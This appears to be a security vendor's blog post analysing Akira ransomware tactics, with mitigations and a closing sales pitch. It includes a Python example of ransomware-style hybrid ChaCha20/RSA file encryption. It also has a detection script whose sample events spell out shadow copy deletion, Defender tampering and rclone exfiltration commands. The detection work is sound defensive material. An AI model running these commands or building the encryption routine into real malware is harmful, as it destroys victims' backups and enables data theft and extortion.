Analyzing the Akira Ransomware Group’s Tactics, Techniques, and Procedures (TTPs)
Key Takeaways:
- Akira ransomware emerged in March 2023, targeting various sectors.
- It employs a double extortion model, encrypting systems and exfiltrating data.
- Mitigation strategies include strong password policies, MFA, and VPN patching.
- Akira has potential links to Conti ransomware group.
- PurpleOps offers services to protect against Akira, including dark web monitoring.
Table of Contents:
- Overview of Akira Ransomware
- Initial Access and Targeting
- Encryption and Data Exfiltration
- Negotiation and Payment
- Technical Analysis of the Ransomware
- Affiliate Model
- Recent Activities and Trends
- Mitigation Strategies
- Specific TTPs Observed
- Impact on Critical Infrastructure
- Response and Recovery
- Tools and Techniques
- Akira Black
- Telegram and underground forum intelligence
- Practical Takeaways
- PurpleOps and Ransomware Protection
- FAQ
Overview of Akira Ransomware
The Akira ransomware group has become a significant threat in the cybersecurity space since its emergence in March 2023. This blog post provides an in-depth analysis of the Akira ransomware group’s tactics, techniques, and procedures (TTPs), focusing on its origins, attack vectors, encryption methods, and mitigation strategies. Understanding these elements is crucial for organizations aiming to bolster their defenses against this prevalent cyber threat.
Akira is a ransomware operation that targets businesses across various sectors, including education, finance, and manufacturing. The group’s name is a reference to the 1988 Japanese animated cyberpunk film “Akira.” Since its emergence, the group has demonstrated a continuous capability to adapt and refine its methods, posing a persistent challenge to cybersecurity professionals.
Although initially treated as a new operation, there is growing evidence of a connection between Akira and the Conti ransomware group. Similarities in source code between Akira and Conti, along with other ransomware variants, have led some researchers to propose a rebrand or offshoot scenario. This potential connection underscores the web of affiliations and re-emergence that characterizes the ransomware ecosystem.
Initial Access and Targeting
Akira primarily targets organizations in North America and Europe. The group employs several initial access vectors, including exploiting vulnerabilities in VPN appliances, using compromised credentials, and conducting phishing campaigns. Specifically, they have been known to exploit vulnerabilities in Cisco ASA VPNs, and VPN services that accept single-factor logins are a recurring weak point, making remote-access infrastructure a critical area for organizations to secure.
Compromised credentials remain a common entry point, emphasizing the importance of robust password policies and multi-factor authentication. Phishing campaigns, often leveraging social engineering tactics, continue to be an effective method for the group to gain initial access to targeted networks.
Encryption and Data Exfiltration
Akira employs a double extortion model, encrypting victims’ systems and exfiltrating sensitive data. This approach increases the pressure on victims to pay the ransom, as the threat of public data disclosure can be as damaging as the disruption caused by encryption.
Akira's file encryption combines ChaCha20 and RSA. ChaCha20 is a fast stream cipher used to encrypt the file contents, while RSA is an asymmetric algorithm used to wrap (encrypt) the per-file symmetric key under a public key embedded in the binary, so that only the holder of the operators' private key can recover it. Exfiltration uses tools like Rclone and FileZilla to move large volumes of data out before encryption, often targeting critical databases, documents, and virtual machine images. Large outbound transfers to cloud storage or over FTP/SFTP from servers that never normally upload are a detectable signal; egress monitoring and a breach detection solution should alert on them.
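To make the ChaCha20/RSA combination concrete, here is an added example of the hybrid pattern such ransomware families follow; it is illustrative code written for this post, not Akira's code or any sample analysed here. Each file gets a fresh ChaCha20 key and nonce, the body is encrypted with ChaCha20, and the key material is wrapped under an RSA public key that would ship inside the binary, so decryption requires the private key the operators keep. The ChaCha20 is a straight RFC 8439 implementation in pure Python; the RSA is a textbook toy (512-bit key, no padding) chosen only so the sample runs with no third-party libraries. Function names, key sizes and the blob layout are this example's own assumptions.

```python
import math
import os
import random
import struct

# --- ChaCha20 stream cipher (RFC 8439), pure Python so the sample runs with no dependencies ---
MASK = 0xFFFFFFFF

def _rotl(v, c):
    return ((v << c) & MASK) | (v >> (32 - c))

def _qr(s, a, b, c, d):  # one ChaCha quarter round on state indices a, b, c, d
    s[a] = (s[a] + s[b]) & MASK; s[d] = _rotl(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & MASK; s[b] = _rotl(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & MASK; s[d] = _rotl(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & MASK; s[b] = _rotl(s[b] ^ s[c], 7)

def _block(key, counter, nonce):
    """64-byte keystream block for a 32-byte key, 32-bit counter and 12-byte nonce."""
    state = list(struct.unpack("<4I", b"expand 32-byte k") + struct.unpack("<8I", key)
                 + (counter,) + struct.unpack("<3I", nonce))
    w = state[:]
    for _ in range(10):  # 20 rounds = 10 double rounds (column round + diagonal round)
        _qr(w, 0, 4, 8, 12); _qr(w, 1, 5, 9, 13); _qr(w, 2, 6, 10, 14); _qr(w, 3, 7, 11, 15)
        _qr(w, 0, 5, 10, 15); _qr(w, 1, 6, 11, 12); _qr(w, 2, 7, 8, 13); _qr(w, 3, 4, 9, 14)
    return struct.pack("<16I", *((x + y) & MASK for x, y in zip(w, state)))

def chacha20_xor(key, nonce, data, counter=1):
    """Encrypt or decrypt (same operation): XOR data with the ChaCha20 keystream."""
    out = bytearray(data)
    for i in range(0, len(data), 64):
        ks = _block(key, counter + i // 64, nonce)
        for j in range(min(64, len(data) - i)):
            out[i + j] ^= ks[j]
    return bytes(out)

# --- Toy textbook RSA (no OAEP padding), used only to wrap the per-file key ---
def _probable_prime(n, rounds=20):
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2; r += 1
    for _ in range(rounds):  # Miller-Rabin
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def rsa_keygen(bits=512):
    """Returns (public, private) as (n, e), (n, d). Far too small for real use; demo only."""
    e = 65537
    while True:
        p = q = 0
        while not _probable_prime(p): p = random.getrandbits(bits // 2) | (1 << (bits // 2 - 1)) | 1
        while not _probable_prime(q): q = random.getrandbits(bits // 2) | (1 << (bits // 2 - 1)) | 1
        n, phi = p * q, (p - 1) * (q - 1)
        if p != q and math.gcd(e, phi) == 1:
            return (n, e), (n, pow(e, -1, phi))

# --- Hybrid scheme: fresh ChaCha20 key per file, wrapped with the operators' RSA public key ---
def encrypt_file(plaintext, public_key):
    n, e = public_key
    file_key, nonce = os.urandom(32), os.urandom(12)          # 44 bytes, fits under a 512-bit n
    klen = (n.bit_length() + 7) // 8
    wrapped = pow(int.from_bytes(file_key + nonce, "big"), e, n).to_bytes(klen, "big")
    return chacha20_xor(file_key, nonce, plaintext) + wrapped  # wrapped key travels with the file

def decrypt_file(blob, private_key):
    n, d = private_key
    klen = (n.bit_length() + 7) // 8
    body, wrapped = blob[:-klen], blob[-klen:]
    unwrapped = pow(int.from_bytes(wrapped, "big"), d, n).to_bytes(44, "big")
    return chacha20_xor(unwrapped[:32], unwrapped[32:], body)
```

The defensive lesson is in the last two functions: the per-file key never exists in the clear on disk after encryption, and recovering it requires the RSA private key, which never touches the victim. Absent an implementation flaw in the malware, there is no decryptor to write, which is why offline, tested backups are the recovery path that actually works.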
Negotiation and Payment
Akira operates a dark web leak site where they publish stolen data from victims who do not pay the ransom. This site serves as a public shaming platform, further incentivizing victims to comply with the group’s demands. Communication with victims typically occurs via email and a dedicated chat platform, where ransom demands are negotiated. Ransom demands vary depending on the size and financial status of the victim organization, with payments usually requested in Bitcoin to maintain anonymity.
Technical Analysis of the Ransomware
The Akira ransomware is written in C++ and is highly configurable, allowing the group to adapt the malware to different environments. It uses various techniques to evade detection, including process injection and anti-analysis mechanisms. Process injection places malicious code inside legitimate processes to hide its activity. Anti-analysis mechanisms are designed to thwart attempts to reverse engineer or debug the malware, making it more difficult for security researchers to understand its functionality.
The ransomware is designed to encrypt files with specific extensions, targeting databases, documents, and virtual machine images. This targeted approach ensures that critical data is encrypted, maximizing the impact on the victim organization.
Affiliate Model
Akira operates under an affiliate model, where different groups of cybercriminals are recruited to deploy the ransomware. This allows the core Akira team to focus on developing and maintaining the ransomware, while affiliates handle the actual attacks. This division of labor enables the group to scale its operations and increase its reach.
Recent Activities and Trends
Akira has been increasingly active, with a reported surge in attacks in late 2023 and early 2024. They continue to target a wide range of organizations, and their tactics are constantly evolving. The emergence of Akira Black, a more recent variant written in Rust, demonstrates the group's commitment to innovation and adaptation.
Mitigation Strategies
Organizations can mitigate the risk of Akira ransomware attacks by implementing several key security measures:
- Strong Password Policies: Enforce strong, unique passwords and regularly update them.
- Multi-Factor Authentication: Enable multi-factor authentication (MFA) for all critical accounts and services.
- VPN Patching: Promptly patch vulnerabilities in VPNs, particularly those in Cisco ASA VPNs.
- Security Awareness Training: Provide regular security awareness training to employees to educate them about phishing attacks and other social engineering tactics.
- Data Backups: Regularly back up data to a secure, off-site location.
- Network Segmentation: Implement network segmentation to limit the lateral movement of attackers within the network.
- Endpoint Detection and Response (EDR): Deploy EDR solutions to detect and respond to malicious activity on endpoints.
- Cyber Threat Intelligence: Implement a comprehensive cyber threat intelligence platform to stay informed about the latest threats and vulnerabilities.
Specific TTPs Observed
Akira employs a range of specific tactics, techniques, and procedures (TTPs) in its attacks:
- Exploiting CVE-2020-3187: Exploiting CVE-2020-3187 (a path traversal in the web services interface of Cisco ASA and FTD software) to gain initial access through the VPN-facing interface.
- RDP for Lateral Movement: Using RDP (Remote Desktop Protocol) for lateral movement within the network.
- Disabling Security Tools: Disabling security tools like antivirus software to evade detection.
- Deleting Shadow Copies: Deleting shadow copies to prevent data recovery.
- PowerShell Scripts: Employing PowerShell scripts for reconnaissance and deployment.
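Most of the TTPs listed above, and the Rclone/FileZilla exfiltration described under Encryption and Data Exfiltration, leave traces in ordinary Windows process-creation and logon telemetry. As an added example (not from the original post, and not tied to any real Akira sample), the Python below runs detection logic over a few constructed events shaped like Windows Security events 4688 (process creation) and 4624 (logon): it flags shadow copy deletion, exfiltration tooling and Defender tampering, decodes PowerShell -EncodedCommand payloads before matching so that encoding does not hide them, and escalates severity when the activity follows an RDP (logon type 10) session on the same host. Event field names follow the Windows Security log; the hosts, IPs, timestamps and command lines are fabricated for the example.

```python
import base64
import re

# Constructed sample telemetry shaped like Windows Security events 4624 (logon) and 4688
# (process creation). Fabricated for this example; not real Akira artefacts.
ENC_PS = base64.b64encode(
    "Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.Delete() }".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"id": 4624, "host": "FS01", "ts": 100, "LogonType": 10, "IpAddress": "10.0.5.23",
     "TargetUserName": "svc_backup"},
    {"id": 4688, "host": "FS01", "ts": 130, "NewProcessName": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"id": 4688, "host": "FS01", "ts": 131,
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + ENC_PS},
    {"id": 4688, "host": "FS01", "ts": 140,
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"id": 4688, "host": "FS01", "ts": 200, "NewProcessName": r"C:\Users\Public\rclone.exe",
     "CommandLine": "rclone.exe copy D:\\Finance remote:staging --transfers 32"},
    {"id": 4688, "host": "WS07", "ts": 210, "NewProcessName": r"C:\Program Files\7-Zip\7z.exe",
     "CommandLine": "7z.exe a quarterly.7z docs"},
]

# Command-line patterns for the TTPs listed above. Case-insensitive; tune to your environment.
RULES = {
    "shadow_copy_deletion": re.compile(
        r"vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete"
        r"|Win32_ShadowCopy.*\.Delete\(", re.I),
    "exfiltration_tool": re.compile(r"(?:^|[\\\s])(?:rclone|filezilla|winscp)(?:\.exe)?\b", re.I),
    "security_tool_tampering": re.compile(
        r"Set-MpPreference\s+-Disable|(?:sc|net)(?:\.exe)?\s+stop\s+\S*(?:sense|defend|mpssvc)", re.I),
}
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_PS = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_powershell(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None if absent/invalid."""
    m = ENCODED_PS.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError subclass
        return None

def analyze_process_event(event):
    """Match rules against the command line and, if present, its decoded PowerShell payload."""
    cmd = event.get("CommandLine", "")
    decoded = decode_encoded_powershell(cmd)
    hits = {"encoded_powershell"} if decoded else set()
    for text in [cmd] + ([decoded] if decoded else []):
        hits.update(name for name, rx in RULES.items() if rx.search(text))
    return sorted(hits)

def triage(events, window=3600):
    """Per host, raise severity when a matching process follows an RDP (logon type 10) logon."""
    findings, rdp_logons = {}, {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        host = ev["host"]
        if ev["id"] == 4624 and ev.get("LogonType") == 10:
            rdp_logons.setdefault(host, []).append((ev["ts"], ev.get("IpAddress")))
            continue
        if ev["id"] != 4688:
            continue
        recent = [l for l in rdp_logons.get(host, []) if 0 <= ev["ts"] - l[0] <= window]
        for rule in analyze_process_event(ev):
            findings.setdefault(host, []).append({
                "ts": ev["ts"], "rule": rule,
                "severity": "critical" if recent else "high",
                "after_rdp_from": recent[-1][1] if recent else None,
            })
    return findings

if __name__ == "__main__":
    for host, items in triage(SAMPLE_EVENTS).items():
        for f in items:
            print(host, f)
```

Run as-is it reports five findings on FS01, all marked critical because they follow the RDP logon from 10.0.5.23, and nothing on WS07. The point of decoding before matching is that the shadow copy deletion at ts 131 is invisible to a rule that only looks at the raw command line; the correlation step is what turns four medium-confidence hits into a single high-confidence story that matches the RDP-then-destroy-then-exfiltrate sequence described in this section.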
Impact on Critical Infrastructure
While not exclusively targeting critical infrastructure, Akira's attacks on sectors such as manufacturing and finance can indirectly impact critical services and supply chains. Disruption of these sectors can have cascading effects on essential services, which is why organizations in them should prioritize cybersecurity and monitor the risk their suppliers introduce.
Response and Recovery
In the event of an Akira ransomware attack, organizations should take immediate steps to contain the damage and initiate recovery procedures:
- Isolate Affected Systems: Immediately isolate affected systems to prevent further spread of the ransomware.
- Notify Law Enforcement: Notify law enforcement authorities, such as the FBI or local police, to report the incident.
- Engage Incident Response Experts: Engage with incident response experts to assist with containment, eradication, and recovery efforts.
- Data Recovery: Explore data recovery options, including restoring from backups or negotiating with the attackers (though not recommended).
Tools and Techniques
Akira is observed using Cobalt Strike for command and control, enabling them to remotely control compromised systems and coordinate their attacks. They also use custom tools for network scanning and credential harvesting, allowing them to gather information about the targeted network and identify potential vulnerabilities.
Akira Black
The emergence of Akira Black, a more recent variant of the Akira ransomware family written in Rust, highlights the group’s ongoing development efforts. Rust is a modern programming language known for its memory safety and performance, making it an attractive choice for malware developers. Akira Black targets both Windows and Linux systems, expanding the group’s potential victim pool.
Telegram and underground forum intelligence
The group uses Telegram to amplify its impact, sharing stolen data and communicating with affiliates, which lets it disseminate information and coordinate activity quickly. Monitoring Telegram channels and underground forums is therefore a relevant source of early warning about claimed victims and affiliate recruitment.
Practical Takeaways
For Technical Readers:
- Implement network segmentation to restrict lateral movement.
- Regularly audit and patch VPN infrastructure, especially Cisco ASA devices.
- Deploy and maintain Endpoint Detection and Response (EDR) solutions.
- Utilize threat intelligence feeds to stay updated on Akira’s latest TTPs.
- Implement application allowlisting (whitelisting) to prevent unauthorized software such as Rclone or remote-access tools from executing.
For Non-Technical Readers (Business Leaders):
- Ensure your organization has a comprehensive incident response plan.
- Invest in employee security awareness training, focusing on phishing and social engineering.
- Prioritize data backup and recovery strategies.
- Consider cyber insurance to mitigate financial losses from ransomware attacks.
- Engage with cybersecurity consultants to assess and improve your security posture.
PurpleOps and Ransomware Protection
PurpleOps offers a range of services designed to help organizations protect themselves from ransomware attacks, including Akira. Our cyber threat intelligence platform provides real-time ransomware intelligence, dark web monitoring, and live ransomware API access, enabling organizations to stay ahead of emerging threats. We also offer brand leak alerting and supply-chain risk monitoring. Our services include:
- Red Team Operations: Simulate real-world attacks to identify vulnerabilities and weaknesses in your defenses.
- Penetration Testing: Conduct thorough assessments of your systems and networks to uncover exploitable vulnerabilities.
- Supply Chain Information Security: Ensure that your vendors and partners meet the same high standards of security as your organization.
- Dark Web Monitoring: Monitor the dark web for mentions of your organization, stolen credentials, and other sensitive information.
By leveraging PurpleOps’ expertise and services, organizations can significantly reduce their risk of falling victim to Akira ransomware and other cyber threats.
To learn more about how PurpleOps can help you protect your organization from ransomware, visit our website or contact us for a consultation at PurpleOps Solutions.
FAQ
Q: What is Akira ransomware?
A: Akira is a ransomware group that emerged in March 2023, targeting businesses across various sectors with a double extortion model.
Q: How does Akira gain initial access to networks?
A: Akira primarily uses exploited VPN vulnerabilities, compromised credentials, and phishing campaigns to gain initial access.
Q: What steps can organizations take to mitigate the risk of Akira ransomware attacks?
A: Implementing strong password policies, enabling MFA, patching VPN vulnerabilities, providing security awareness training, and regularly backing up data are crucial mitigation steps.
Q: Is there a connection between Akira and other ransomware groups?
A: Evidence suggests a possible connection between Akira and the Conti ransomware group due to similarities in source code.
Q: What is Akira Black?
A: Akira Black is a more recent variant of the Akira ransomware family written in Rust, targeting both Windows and Linux systems.